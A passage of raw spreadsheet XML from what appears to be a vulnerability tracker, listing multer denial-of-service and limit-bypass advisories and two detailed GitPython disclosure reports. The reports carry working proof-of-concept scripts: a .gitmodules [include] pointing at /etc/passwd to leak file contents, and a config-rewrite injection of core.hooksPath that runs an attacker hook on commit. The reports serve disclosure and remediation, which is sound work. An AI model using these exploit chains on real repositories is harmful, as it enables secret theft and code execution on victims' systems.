r="S30" s="5" t="inlineStr"><is><t>### Impact

A vulnerability in multer `2.2.0` allows an attacker to trigger a Denial of Service (DoS) by aborting or truncating multipart uploads. When using `diskStorage`, the destination write stream is not closed if the upload is aborted before it finishes, so each failed request leaks an open file descriptor and retains its disk blocks until the process exits. Repeated failed uploads can exhaust the available file descriptors. All applications using multer's disk storage are affected.

### Patches

Users should upgrade to `2.3.0`.

### Workarounds

None.</t></is></c><c r="T30" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77037</t></is></c></row><row r="31"><c r="A31" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B31" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C31" s="5" t="inlineStr"><is><t>CVE-2026-77063</t></is></c><c r="D31" s="5" t="inlineStr" /><c r="E31" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F31" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G31" s="5" t="inlineStr" /><c r="H31" s="5" t="n"><v>0.002</v></c><c r="I31" s="5" t="inlineStr" /><c r="J31" s="5" t="inlineStr" /><c r="K31" s="5" t="inlineStr" /><c r="L31" s="5" t="inlineStr"><is><t>npm:multer</t></is></c><c r="M31" s="5" t="inlineStr"><is><t>2.3.0</t></is></c><c r="N31" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O31" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P31" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q31" s="5" t="inlineStr" /><c r="R31" s="5" t="inlineStr" /><c r="S31" s="5" t="inlineStr"><is><t>### Impact

When `multer` is configured with an asynchronous `fileFilter`, the `limits.fileSize` limit can be bypassed. The `'limit'` event is registered inside the async `fileFilter` callback, so if a file exceeds `limits.fileSize` before that callback runs, the event is missed and the oversized upload is accepted instead of being rejected with a `LIMIT_FILE_SIZE` error. Applications that rely on `limits.fileSize` to reject oversized uploads are affected on all upload methods (`.single()`, `.array()`, `.fields()`, `.any()`). Uploads using a synchronous `fileFilter` are not affected.

### Patches

Users should upgrade to `2.3.0`.

### Workarounds

Use a synchronous `fileFilter`, or validate the uploaded file size after the upload completes.</t></is></c><c r="T31" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77063</t></is></c></row><row r="32"><c r="A32" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B32" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C32" s="5" t="inlineStr"><is><t>CVE-2026-77078</t></is></c><c r="D32" s="5" t="inlineStr" /><c r="E32" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F32" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G32" s="5" t="inlineStr" /><c r="H32" s="5" t="n"><v>0.003</v></c><c r="I32" s="5" t="inlineStr" /><c r="J32" s="5" t="inlineStr" /><c r="K32" s="5" t="inlineStr" /><c r="L32" s="5" t="inlineStr"><is><t>npm:multer</t></is></c><c r="M32" s="5" t="inlineStr"><is><t>2.3.0</t></is></c><c r="N32" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O32" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P32" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q32" s="5" t="inlineStr" /><c r="R32" s="5" t="inlineStr" /><c r="S32" s="5" t="inlineStr"><is><t>### Impact

A vulnerability in multer allows a remote, unauthenticated attacker to crash the Node.js process with a single `multipart/form-data` request. Two specially crafted text field names cause an uncaught `RangeError: Invalid array length` inside multer's field parsing, which is not routed to the application error handler and terminates the process. All applications using multer to parse multipart requests are affected.

### Patches

Users should upgrade to `2.3.0`.

### Workarounds

None.</t></is></c><c r="T32" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77078</t></is></c></row><row r="33"><c r="A33" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B33" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C33" s="5" t="inlineStr"><is><t>CVE-2026-78675</t></is></c><c r="D33" s="5" t="inlineStr" /><c r="E33" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F33" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G33" s="5" t="inlineStr" /><c r="H33" s="5" t="n"><v>0.001</v></c><c r="I33" s="5" t="inlineStr" /><c r="J33" s="5" t="inlineStr" /><c r="K33" s="5" t="inlineStr" /><c r="L33" s="5" t="inlineStr"><is><t>PyPI:gitpython</t></is></c><c r="M33" s="5" t="inlineStr"><is><t>3.1.59</t></is></c><c r="N33" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O33" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P33" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q33" s="5" t="inlineStr" /><c r="R33" s="5" t="inlineStr" /><c r="S33" s="5" t="inlineStr"><is><t># [HIGH] Arbitrary local file content disclosure via `[include]` directive in untrusted `.gitmodules` (`SubmoduleConfigParser` never disables `merge_includes`)

- **CWE:** CWE-200 (Exposure of Sensitive Information) / CWE-73 (External Control of File Name or Path)
- **Affected component:** `git/objects/submodule/base.py`, `Submodule._config_parser()` (~line 273) constructing `SubmoduleConfigParser(fp_module, read_only=read_only)`; `git/config.py`, `GitConfigParser.__init__` (`merge_includes` default), `GitConfigParser.read()`/`_included_paths()` (include-path resolution, ~lines 630-685), `GitConfigParser._read()` (~line 493-498, `MissingSectionHeaderError`)
- **Affected version:** GitPython at HEAD (`9729ed3b948f2bde09f1f188c5311e172212b67e`, 2026-08-05, VERSION `3.1.58`)

## Reachability
`GitConfigParser.__init__` defaults `merge_includes=True`: any config file it parses has its `[include]` (and, when a `repo=` is supplied, `[includeIf ...]`) directives followed and merged in. The maintainers already recognized this as dangerous for one specific case and fixed it in commit `41ecc6a4` ("Disable merge_includes in config writers"), which passes `merge_includes=False` when `Repo.config_writer()` builds its parser (`git/repo/base.py`).

That fix never touched `Submodule._config_parser()`. This method builds the parser used for **every** read of a repo's submodule configuration — `repo.submodules`, `Submodule.iter_items()`, `Submodule.config()` — via `SubmoduleConfigParser(fp_module, read_only=read_only)`, passing neither `merge_includes=False` nor `repo=`. The `True` class default is therefore inherited unchanged, and `fp_module` here is `.gitmodules` — **the single most attacker-controlled config file in the entire codebase**, since it ships verbatim as tracked content inside any cloned repository.

`GitConfigParser.read()`'s include-path resolution (~line 662-680) performs no containment check: `osp.isabs(include_path)` short-circuits the path join entirely for an absolute path, and a relative path is joined with `osp.join(osp.dirname(file_path), include_path)` / `osp.normpath()`'d with no check that the result stays under the repository. `~` is expanded via `osp.expanduser`. The only gate before opening is `os.access(include_path, os.R_OK)` — a readability check, not a path restriction.

Once opened, `GitConfigParser._read()` parses the target file as git-config INI. If the first non-blank/non-comment line is not a `[section]` header — true of virtually any non-gitconfig file (source code, `/etc/passwd`, `.env` files, credential files, logs, JSON/YAML) — it raises `configparser.MissingSectionHeaderError(fpname, lineno, line)`. Python's stdlib formats this exception's `str()` as `"File contains no section headers.\nfile: %r, line: %d\n%r" % (fpname, lineno, line)` — it embeds the **verbatim content** of that file's first line in the exception message. `Submodule.iter_items()` catches only `(IOError, BadName)`, not `configparser.Error`, so this exception propagates straight out of the ordinary, read-only `repo.submodules` call.

## Root cause
Parity gap between two config-parser construction sites for the exact same footgun: `Repo.config_writer()` was hardened against `merge_includes` in 2023 (`41ecc6a4`); `Submodule._config_parser()` — which parses `.gitmodules`, content that is *always* attacker-controlled the moment a repository is cloned from an untrusted source — was never given the same treatment. (The submodule *write*-mode config parser at `git/objects/submodule/base.py` for `.git/modules/&lt;name&gt;/config` — a different, locally-generated file — has correctly passed `merge_includes=False` since 2022, underscoring that the omission for `.gitmodules` reads looks like an oversight rather than a considered exception.)

## Exploit path
1. Attacker crafts a repository whose `.gitmodules` contains a legitimate-looking `[submodule ...]` section plus:
   ```
   [include]
   	path = /etc/passwd
   ```
   (an absolute path bypasses any traversal reasoning entirely; a relative `../../../../etc/passwd`-style path works too).
2. Victim performs the extremely common, entirely read-only operation of enumerating a cloned repo's submodules: `list(repo.submodules)` (or any `for sm in repo.submodules`) — no `update()`, `init()`, or checkout of any kind required.
3. `SubmoduleConfigParser` (inheriting `merge_includes=True`) follows the `[include]` directive, opens `/etc/passwd`, and `GitConfigParser._read()` raises `MissingSectionHeaderError` whose message embeds `/etc/passwd`'s first line verbatim.
4. This exception surfaces wherever the host application observes exceptions from GitPython — CI logs, error pages, exception trackers, or any dependency-scanner/code-review-bot/hosting-platform tool built on `repo.submodules` — disclosing the targeted file's first line to the attacker (directly, or indirectly via any channel that echoes the error).

## Impact
Non-blind local file content disclosure (first line) of any file readable by the victim process, triggered purely by attacker-controlled repository content and one routine, read-only GitPython call. Bounded to one line per triggering file (parsing aborts at the first `MissingSectionHeaderError`), but that line very often *is* the secret — `.env` files (`DATABASE_URL=...`, `API_KEY=...`), single-line credential/token files, `/etc/passwd`'s root entry for host fingerprinting. The primitive additionally serves as a generic error-based file-existence oracle for arbitrary host paths. This is materially stronger than the already-fixed, explicitly **blind** `GHSA-cwvm-v4w8-q58c` ("Blind local file inclusion", CVSS 4.0, `git/refs/symbolic.py` ref-name resolution) — that advisory's own writeup states it cannot disclose content; this one does, verbatim, via a different module (`git/config.py`'s include resolution).

## Preconditions
- Victim clones (or otherwise opens with GitPython) a repository whose `.gitmodules` is attacker-controlled — the default trust model for any tool that processes third-party repositories (dependency scanners, CI, code hosting/review bots, "audit this repo" utilities — exactly the class of application GitPython itself is built for).
- Victim performs any operation that touches `repo.submodules` — one of the most ordinary GitPython operations, requiring no submodule `update`/`init`/checkout.
- No authentication/role requirement inside GitPython itself.

## Evidence
- `git/config.py` — `GitConfigParser.__init__` defaults `merge_includes=True`.
- `git/objects/submodule/base.py:273` — `SubmoduleConfigParser(fp_module, read_only=read_only)` passes neither `merge_includes` nor `repo=`; `git blame` shows this call unchanged since the class was introduced, and `git show 41ecc6a4` confirms that commit touched only `git/repo/base.py`'s `Repo.config_writer()`, never this call site.
- `git/config.py` `_included_paths()`/`read()` (~630-685) — absolute include paths bypass the join/normpath entirely (`osp.isabs()` short-circuit); no repository-boundary containment check exists anywhere in this path.
- `git/config.py` `_read()` (~493-498) — raises `cp.MissingSectionHeaderError(fpname, lineno, line)` with the raw file line embedded, matching Python stdlib `configparser`'s own `__str__` behavior.
- `Submodule.iter_items()` catches only `(IOError, BadName)` — `configparser.Error` (the base of `MissingSectionHeaderError`) is not swallowed.
- PoC (`gitpython-003-poc.py`, embedded below) reproduces this end-to-end against this exact checkout via the public API only (`Repo.clone_from` + `list(repo.submodules)`, default arguments, no monkeypatching), against both a throwaway secret file and `/etc/passwd`.

## False-positive check (adversarial re-read)
- **Is this the same bug as `GHSA-hmq2-w58f-27jc`?** No — that advisory is about the `.gitmodules` submodule *name* driving `_module_abspath`/`os.makedirs()` (creating a git repository/module directory outside the working tree, a write/RCE-adjacent primitive via a completely different function). This finding is about the `[include]` directive in the *same file* reaching a config-parser read primitive — a different mechanism, different function, different impact class (content disclosure, not directory creation).
- **Is this the same bug as `GHSA-cwvm-v4w8-q58c` (blind LFI)?** No — that advisory is explicitly documented by its own reporter as content-free/blind (existence-only), and lives in `git/refs/symbolic.py`'s ref-name resolution feeding `Repo.commit`/`tree`/`index.diff` — an entirely different module and code path. This finding discloses actual file content via `git/config.py`'s include-directive resolution.
- **Is the impact overstated given only one line leaks?** No — this is an accurate scoping caveat already reflected in the severity/impact discussion, not a reachability blocker: attacker has full control over which path is targeted (absolute paths work unconditionally), requires zero interaction beyond the single most common submodule operation, and the PoC demonstrates a real, working end-to-end disclosure through the standard `clone_from` + `list(repo.submodules)` workflow.
- **Could the exception simply be silently swallowed by GitPython before reaching the caller?** No — confirmed by reading `Submodule.iter_items()`'s exception handling, which catches only `IOError`/`BadName`; `configparser.MissingSectionHeaderError` propagates uncaught.
- Verdict: no concrete blocker found. **CONFIRMED** — reproduced independently against both a throwaway secret file and `/etc/passwd`.

## Remediation
Pass `merge_includes=False` when constructing `SubmoduleConfigParser` in `Submodule._config_parser()` (`git/objects/submodule/base.py`), mirroring the existing fix in `Repo.config_writer()` (commit `41ecc6a4`) — `.gitmodules` content is always attacker-controlled and should never be allowed to pull in `include`/`includeIf` directives. As defense in depth, `GitConfigParser.read()`'s include-path resolution should enforce that resolved include paths stay within the repository's own directory tree, and parsing-error messages (`MissingSectionHeaderError`/`ParsingError`) should avoid embedding raw file content when parsing a file the caller did not explicitly ask to open.

## Confidence
High. Root cause confirmed by direct code reading across both `git/config.py` and `git/objects/submodule/base.py`, cross-checked against the fix commit that hardened the sibling code path but not this one; exploit chain reproduced independently, twice, against the current HEAD (a throwaway secret file and `/etc/passwd`).


## Proof-of-Concept source (`gitpython-003-poc.py`)

```python
#!/usr/bin/env python3
"""
GITPYTHON-003 PoC: `.gitmodules` -- fully attacker-controlled content shipped
inside a cloned repository -- can contain `[include] path = &lt;any local path&gt;`.
`Submodule._config_parser()` builds the parser used for `repo.submodules` (and
other submodule reads) via `SubmoduleConfigParser(fp_module, read_only=...)`
without passing `merge_includes=False`, so the class default `merge_includes=True`
is inherited. GitConfigParser then opens the target file; if it isn't valid
git-config syntax (true of virtually any non-gitconfig file), Python's
`configparser.MissingSectionHeaderError` embeds the file's first line verbatim
in its exception message, which propagates out of the ordinary, read-only
`repo.submodules` call -- a non-blind local file content disclosure primitive.

Run:
  PYTHONPATH="&lt;repo&gt;:&lt;repo&gt;/gitdb:&lt;repo&gt;/smmap" python3 gitpython-003-poc.py &lt;workdir&gt; &lt;target-file&gt;

Benign: reads only the given &lt;target-file&gt; (defaults to a throwaway secret file
created under &lt;workdir&gt; if omitted) and never writes/exfiltrates it anywhere
except printing it locally to prove the primitive. No destructive action.
"""
import os
import subprocess
import sys


def main():
    workdir = sys.argv[1] if len(sys.argv) &gt; 1 else "/tmp/gitpython-003-poc"
    target_file = sys.argv[2] if len(sys.argv) &gt; 2 else os.path.join(workdir, "secret.txt")

    attacker_repo = os.path.join(workdir, "attacker-repo")
    dest = os.path.join(workdir, "dest")
    for p in (attacker_repo, dest):
        os.makedirs(p, exist_ok=True)

    if not os.path.exists(target_file):
        os.makedirs(os.path.dirname(target_file), exist_ok=True)
        with open(target_file, "w") as f:
            f.write("TOP-SECRET-DB-PASSWORD=hunter2-actual-secret-value\n")

    subprocess.run(["git", "init", "-q", "-b", "main", attacker_repo], check=True)
    subprocess.run(["git", "-C", attacker_repo, "config", "user.email", "a@example.com"], check=True)
    subprocess.run(["git", "-C", attacker_repo, "config", "user.name", "Attacker"], check=True)

    with open(os.path.join(attacker_repo, "file.txt"), "w") as f:
        f.write("hello\n")

    with open(os.path.join(attacker_repo, ".gitmodules"), "w") as f:
        f.write(
            '[submodule "totally-normal-dep"]\n'
            "\tpath = vendor/dep\n"
            "\turl = https://example.com/dep.git\n"
            "[include]\n"
            "\tpath = %s\n" % target_file
        )

    subprocess.run(["git", "-C", attacker_repo, "add", "file.txt", ".gitmodules"], check=True)
    subprocess.run(["git", "-C", attacker_repo, "commit", "-q", "-m", "init"], check=True)

    import git  # gitpython under test
    import configparser

    repo = git.Repo.clone_from(attacker_repo, dest)

    try:
        subs = list(repo.submodules)
        print("NOT VULNERABLE: no exception raised, submodules =", subs)
        sys.exit(1)
    except configparser.MissingSectionHeaderError as e:
        msg = str(e)
        print("VULNERABLE: MissingSectionHeaderError leaked file content via repo.submodules:")
        print(msg)
        with open(target_file) as f:
            first_line = f.readline().rstrip("\n")
        if first_line in msg:
            print("Confirmed: target file's first line is present verbatim in the exception message.")
            sys.exit(0)
        else:
            print("NOT VULNERABLE: exception message did not contain the expected content")
            sys.exit(1)


if __name__ == "__main__":
    main()

```</t></is></c><c r="T33" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78675</t></is></c></row><row r="34"><c r="A34" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B34" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C34" s="5" t="inlineStr"><is><t>CVE-2026-78676</t></is></c><c r="D34" s="5" t="inlineStr" /><c r="E34" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F34" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G34" s="5" t="inlineStr" /><c r="H34" s="5" t="n"><v>0.004</v></c><c r="I34" s="5" t="inlineStr" /><c r="J34" s="5" t="inlineStr" /><c r="K34" s="5" t="inlineStr" /><c r="L34" s="5" t="inlineStr"><is><t>PyPI:gitpython</t></is></c><c r="M34" s="5" t="inlineStr"><is><t>3.1.59</t></is></c><c r="N34" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O34" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P34" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q34" s="5" t="inlineStr" /><c r="R34" s="5" t="inlineStr" /><c r="S34" s="5" t="inlineStr"><is><t>- **CWE:** CWE-88 (Argument Injection) / CWE-94 (Code Injection) — via a read-then-corrupt-on-rewrite config round trip, not a direct setter argument
- **Affected component:** `git/config.py` — `GitConfigParser._read()` (multi-line value decoding, lines 444-541, esp. `string_decode()` at line 460 and its call sites at 519/541) and `GitConfigParser._write()`/`write_section()` (serialization, lines ~694-712, esp. line 708)
- **Affected version:** GitPython at HEAD (`9729ed3b948f2bde09f1f188c5311e172212b67e`, 2026-08-05, VERSION `3.1.58`)

## Reachability
GitPython added `UNSAFE_CONFIG_CHARS_RE` / `_value_to_string_safe()` / `_assure_config_name_safe()` guards (commits `c417af46`, `1ed1b924`, `a495ccd3`, and PR #2176) to reject a Python string containing a raw `\r`/`\n`/NUL byte, or syntax-bearing characters, when it is passed as an **argument** to `set()`, `set_value()`, `add_value()`, or `add_section()`. This closed the four config-injection GHSAs above.

That guard is applied only on the write-argument surface. It is never consulted for values that entered `GitConfigParser._sections` via `_read()` — i.e. values that came from parsing an on-disk config file. And `_read()` legitimately supports standard, spec-compliant git config syntax for multi-line values: a quoted value that is not closed on the same physical line continues onto the next physical line (git's own backslash-continuation syntax), and `string_decode()` (`.decode('unicode_escape')`) decodes a literal two-character `\n` **escape sequence** inside such a value into a real embedded LF character in the resulting Python string. No raw control byte is ever written to disk to achieve this — it's the same syntax real `git` itself uses and accepts.

The bug is in what happens when that `GitConfigParser` is later **flushed**: `write_section()` (line ~694) calls the *unsafe* `self._value_to_string(v)` — not `_value_to_string_safe()` — and "handles" any embedded newline in the value with `.replace("\n", "\n\t")` (line 708), emitting a bare, unquoted `&lt;real newline&gt;&lt;tab&gt;` in the output file with no re-quoting and no backslash-continuation marker. Real git does **not** treat an indentation-only continuation the way GitPython's writer assumes — a value only continues across physical lines when the *previous* line ends in a literal `\` immediately before the newline. So the moment `write_section()` re-serializes a previously-decoded multi-line value this way, the second half of that value becomes an **independent, new config line** the next time anyone (GitPython or real `git`) parses the file. If an attacker chooses the dormant value's content to be `&lt;anything&gt;\nhooksPath = &lt;attacker path&gt;`, that second line is parsed as a brand-new `core.hooksPath = &lt;attacker path&gt;` directive — live, real Git configuration, not a value.

`core.hooksPath` is honored by essentially every hook-firing git operation (`commit`, `checkout`, `merge`, `push`, `rebase`, ...), giving arbitrary code execution the next time the host application performs any hook-triggering operation.

## Root cause
`GitConfigParser`'s injection guard is asymmetric: it hardens every *write-argument* entry point (the fix for the four sibling GHSAs) but never hardens the **read → corrupt-on-rewrite round trip**. A value that is 100% legitimate and inert as parsed from disk becomes a newly-injected directive purely through GitPython's own broken re-serialization logic (`write_section()` using the unsafe value-to-string path plus a continuation scheme real git doesn't recognize). The `c417af46` commit message even states its intent explicitly: *"This preserves existing read behavior for config files that already contain multiline values while preventing GitPython from writing new unsafe values"* — i.e. the maintainers consciously scoped the fix to the write-argument surface and did not address what happens when an already-resident multi-line value gets rewritten.

## Exploit path
1. A `.git/config` (or any file merged into it via `[include]`, see below) already contains a dormant, syntactically-legitimate multi-line quoted value, e.g.:
   ```
   [core]
   	zzz = "A\nhooksPath = ../evil-hooks\
   "
   ```
   No raw `\r`, `\n`, or NUL byte appears on disk — this is standard git quoting + backslash-continuation. Real `git config --get core.hookspath` returns nothing at this point (inert); `git config --get core.zzz` returns the decoded string `A\nhooksPath = ../evil-hooks`, identically to GitPython's own reader.
2. The host application opens this repo with GitPython (`git.Repo(path)`, `read_only=False` implicitly for a normal `config_writer()` use) and performs **any** single, unrelated, legitimate config write on the same `GitConfigParser` instance — e.g. `repo.config_writer().set_value("user", "name", "Test User")`. This is one of the most ordinary operations a GitPython-based tool performs.
3. `GitConfigParser._write()`/`write_section()` re-serializes every resident value, including the dormant `zzz` entry, using the unsafe path. The file on disk now contains, verbatim:
   ```
   [core]
   	...
   	zzz = A
   	hooksPath = ../evil-hooks
   ```
4. Real `git config --get core.hookspath` now returns `../evil-hooks` — a key that did not exist before step 2, created purely by GitPython's own write.
5. The next hook-firing git operation (e.g. `git commit`) executes `../evil-hooks/pre-commit` (or whatever hook name the operation looks for), i.e. arbitrary attacker-chosen code execution.

## Impact
Arbitrary code execution, on par with (and more directly triggered than) the already-accepted, High-severity `GHSA-mv93-w799-cj2w`/`GHSA-v87r-6q3f-2j67` "Newline injection... enables RCE via core.hooksPath" advisories, and requiring **no unsafe caller argument at all** — only an attacker-influenced config file plus one ordinary, unrelated write.

## Preconditions
- A config file GitPython opens read-write already contains an attacker-chosen, syntactically-valid multi-line value shaped like `&lt;anything&gt;\n&lt;injected-key&gt; = &lt;injected-value&gt;`. Realistic delivery:
  1. **Pre-existing `.git` directory shipped with a repository** — vendored/template repos, CI workspace/layer caches that preserve `.git`, "repo" tarball/zip distributions that include `.git/config`. The poisoned value sits directly in `.git/config`.
  2. **The documented shared-config `[include]` pattern** (`[include] path = ../&lt;repo-tracked-file&gt;`, pointing at a file inside the working tree) — `GitConfigParser.read()` merges included files' sections into the same `_sections` dict used for writing, so a malicious public repository can ship the poisoned value inside a normal tracked file and have it activated the first time any GitPython-based tool performs any unrelated config write after clone (this requires the victim's own `.git/config` to already reference the include, e.g. via project setup tooling that adds `include.path`).
  3. **Any host application that opens an attacker-influenced config file for read-write and later performs a legitimate write** — the exact trust-boundary the maintainers already accepted as realistic for `GHSA-v87r-6q3f-2j67` (their writeup cites MLRun's `project.push()`).
- No authentication/role requirement inside GitPython itself.

## Evidence
- `git/config.py:460` (`string_decode`), invoked at `git/config.py:519` and `:541` inside `_read()`'s multi-line handling — decodes `unicode_escape`, turning a literal `\n` escape into a real embedded LF.
- `git/config.py:~694-712` (`_write()`/`write_section()`) — uses `self._value_to_string(v)` (unsafe variant) and `.replace("\n", "\n\t")` with no re-quoting.
- `c417af46` (the CR/LF/NUL guard commit) touches only the setter path and explicitly states it preserves existing *read* behavior for multi-line values, per its own commit message.
- `git log -S"string_decode"`, `-S"write_section"`, `-S'replace("\n", "\n\t")'` on `git/config.py` show these code paths have only ever been touched by non-security formatting/refactor commits (`a5fc1d86`, `b825dc74`, `cb68eef0`, `21ec5299`), never by a security fix.
- PoC (`gitpython-002-poc.py`, embedded below) reproduces the full chain end-to-end against this exact checkout: dormant value → one unrelated `config_writer()` write → `core.hookspath` becomes live per real `git config --get` → a subsequent `git commit` executes the injected hook and writes a benign marker file.

## False-positive check (adversarial re-read)
- **Is this just a repeat of the four already-fixed config-injection GHSAs?** No — all four require the *caller* to pass a Python string containing a raw control character or forbidden syntax character as an argument to a setter; all four are now blocked by `UNSAFE_CONFIG_CHARS_RE`/`VALID_CONFIG_OPTION_NAME_RE`/the section quote-state-machine. This finding requires no such caller argument: the payload is smuggled entirely inside a config *file* using standard, valid git escaping that the guard never inspects, and only becomes dangerous through GitPython's own unguarded re-serialization of a value it already holds. Confirmed via `_known-advisories.json` (26 entries, none withdrawn) — none describe this read→corrupt-on-rewrite mechanism.
- **Does real git actually round-trip this value safely (i.e. is this a GitPython-only bug, not a "normal" file)?** Yes, confirmed empirically: after the same crafted `.git/config` is rewritten by *real* `git config user.name Test2` (a control test), the multi-line `zzz` entry is preserved byte-for-byte in its original quoted/continuation form — only GitPython's writer corrupts it.
- **Is there a guard elsewhere that would catch the resulting bare `hooksPath = ...` line before it's trusted?** No — once on disk, it is indistinguishable from a directive the user set intentionally; `core.hooksPath` is honored unconditionally by git's hook-invocation machinery.
- **Does this require an unrealistic precondition?** The precondition (a config file with attacker-influenced content, later legitimately rewritten) mirrors the exact threat model the maintainers already treated as realistic and fixed for `GHSA-v87r-6q3f-2j67`.
- Verdict: no concrete blocker found. **CONFIRMED** — reproduced independently end-to-end (dormant value in place → benign unrelated `config_writer()` write → `core.hookspath` live per real git → hook fires on `git commit`, marker file written).

## Remediation
Either (a) make `write_section()`/`_write()` use `_value_to_string_safe()` (or equivalent re-quoting) for **every** resident value, including those that originated from `_read()`, so an embedded newline is always re-emitted as a properly quoted+backslash-continued value rather than a bare new line, or (b) reject/neutralize embedded control characters in values at read time before they can reach `_sections` at all if the parser is opened in `read_only=False` mode, or (c) canonicalize output using git's own `git config --file &lt;path&gt; --replace-all` semantics instead of a hand-rolled writer. Option (a) is the most surgical fix and matches the spirit of `_value_to_string_safe()` already used on the setter path.

## Confidence
High. Root cause independently re-derived and confirmed by direct code reading; full exploit chain (dormant value → benign unrelated write → live `core.hookspath` → hook execution with a benign marker) reproduced twice, independently, against the current HEAD.


## Proof-of-Concept source (`gitpython-002-poc.py`)

```python
#!/usr/bin/env python3
"""
GITPYTHON-002 PoC: a dormant, legitimately-encoded multi-line git-config value
(standard quoted + backslash-continuation syntax, containing an escaped "\\n"
that decodes to a real embedded newline in memory) is corrupted into a NEW,
live config key the moment GitConfigParser re-serializes it during any
unrelated write. If the smuggled second "line" looks like
"hooksPath = &lt;attacker path&gt;", it becomes a real, active core.hooksPath after
one unrelated GitPython config write, and fires attacker code on the next
hook-triggering git operation (e.g. `git commit`).

This is CWE-88/CWE-94 style argument/config injection, but via the READ path
(a config file GitPython parses and later rewrites), not via a Python kwarg
argument -- distinct from the already-fixed GHSA-mv93-w799-cj2w /
GHSA-v87r-6q3f-2j67 / GHSA-3rp5-jjmw-4wv2 / GHSA-jm78-9fvv-mhgr, which all
guard the setter-argument surface only.

Run:
  PYTHONPATH="&lt;repo&gt;:&lt;repo&gt;/gitdb:&lt;repo&gt;/smmap" python3 gitpython-002-poc.py &lt;workdir&gt;

Benign: only writes/reads inside &lt;workdir&gt;. The "malicious" hook just writes a
marker file; no destructive/exfiltrating payload. Exits non-zero and prints
"NOT VULNERABLE" if the corruption / hook does not fire.
"""
import os
import subprocess
import sys


def main():
    workdir = sys.argv[1] if len(sys.argv) &gt; 1 else "/tmp/gitpython-002-poc"
    repo_dir = os.path.join(workdir, "repo")
    hooks_dir = os.path.join(workdir, "evil-hooks")
    marker = os.path.join(workdir, "PWNED_MARKER.txt")

    for p in (repo_dir, hooks_dir):
        os.makedirs(p, exist_ok=True)
    if os.path.exists(marker):
        os.remove(marker)

    subprocess.run(["git", "init", "-q", "-b", "main", repo_dir], check=True)
    subprocess.run(["git", "-C", repo_dir, "config", "user.email", "test@example.com"], check=True)
    subprocess.run(["git", "-C", repo_dir, "config", "user.name", "Test"], check=True)

    # Rewrite .git/config with a dormant, 100%-valid multi-line quoted value
    # inside [core] (before any other section). No raw CR/LF/NUL byte is
    # written to disk here -- this is standard git config quoting +
    # backslash-line-continuation, decoded by both real git and GitConfigParser
    # into the Python string 'A\nhooksPath = ../evil-hooks'.
    cfg_path = os.path.join(repo_dir, ".git", "config")
    with open(cfg_path) as f:
        original = f.read()
    poisoned_entry = '\tzzz = "A\\nhooksPath = ../evil-hooks\\\n"\n'
    # Insert right after the [core] header line so it lives in the same section.
    new_config = original.replace("[core]\n", "[core]\n" + poisoned_entry, 1)
    with open(cfg_path, "w") as f:
        f.write(new_config)

    # Confirm it's inert per real git before touching GitPython.
    pre = subprocess.run(
        ["git", "-C", repo_dir, "config", "--get", "core.hookspath"],
        capture_output=True, text=True,
    )
    if pre.returncode == 0:
        print("SETUP ERROR: core.hookspath already set before GitPython touched anything")
        sys.exit(2)

    # Malicious hook: benign marker only.
    hook_path = os.path.join(hooks_dir, "pre-commit")
    with open(hook_path, "w") as f:
        f.write('#!/bin/sh\necho "PWNED-VIA-GITPYTHON-CONFIG-INJECTION" &gt; "%s"\nexit 0\n' % marker)
    os.chmod(hook_path, 0o755)

    import git  # gitpython under test

    repo = git.Repo(repo_dir)
    before = repo.config_reader().get_value("core", "zzz")
    print("core.zzz before any GitPython write =", repr(before))

    # ONE totally unrelated, benign write -- this is the only "attacker-adjacent"
    # action required, and it is something virtually every GitPython consumer
    # does routinely (setting an option, adding a remote, updating a branch's
    # tracking config, ...).
    with repo.config_writer() as cw:
        cw.set_value("user", "name", "Test User")

    post = subprocess.run(
        ["git", "-C", repo_dir, "config", "--get", "core.hookspath"],
        capture_output=True, text=True,
    )
    if post.returncode != 0:
        print("NOT VULNERABLE: core.hookspath still absent after the unrelated write")
        sys.exit(1)

    injected_path = post.stdout.strip()
    print("core.hookspath is now LIVE after one unrelated write:", injected_path)

    # Trigger the hook with a normal commit to prove it fires.
    with open(os.path.join(repo_dir, "file2.txt"), "w") as f:
        f.write("change\n")
    subprocess.run(["git", "-C", repo_dir, "add", "file2.txt"], check=True)
    subprocess.run(
        ["git", "-C", repo_dir, "-c", "user.email=t@example.com", "-c", "user.name=T",
         "commit", "-q", "-m", "trigger hook"],
        check=True,
    )

    if os.path.isfile(marker):
        with open(marker) as f:
            content = f.read().strip()
        print("VULNERABLE: hook fired, marker content =", content)
        sys.exit(0)
    else:
        print("NOT VULNERABLE: hook did not fire")
        sys.exit(1)


if __name__ == "__main__":
    main()

